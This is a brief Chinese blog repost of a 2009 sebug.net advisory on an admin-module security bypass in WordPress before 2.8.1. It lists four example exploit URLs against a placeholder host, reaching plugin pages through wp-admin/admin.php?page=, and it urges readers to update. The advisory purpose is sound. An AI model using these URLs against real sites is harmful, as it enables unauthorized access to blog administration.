发布时间:2009-07-22
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
Wordpress < 2.8.1 All Version suffer from admin module configuration security bypass exploit , attackers use these urls to attack the blog.
http://xxx.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://xxx.com/wp-admin/admin.php?page=akismet/readme.txt
http://xxx.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://xxx.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php
It is harmful.Please update your blog as soon as you can.
// sebug.net [2009-07-22]
转载原创文章请注明,转载自:[Lin's Space|Only]
本文链接: http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/
Google比较注重原创性和时效性,若没有找到需要的内容可尝试以下搜素。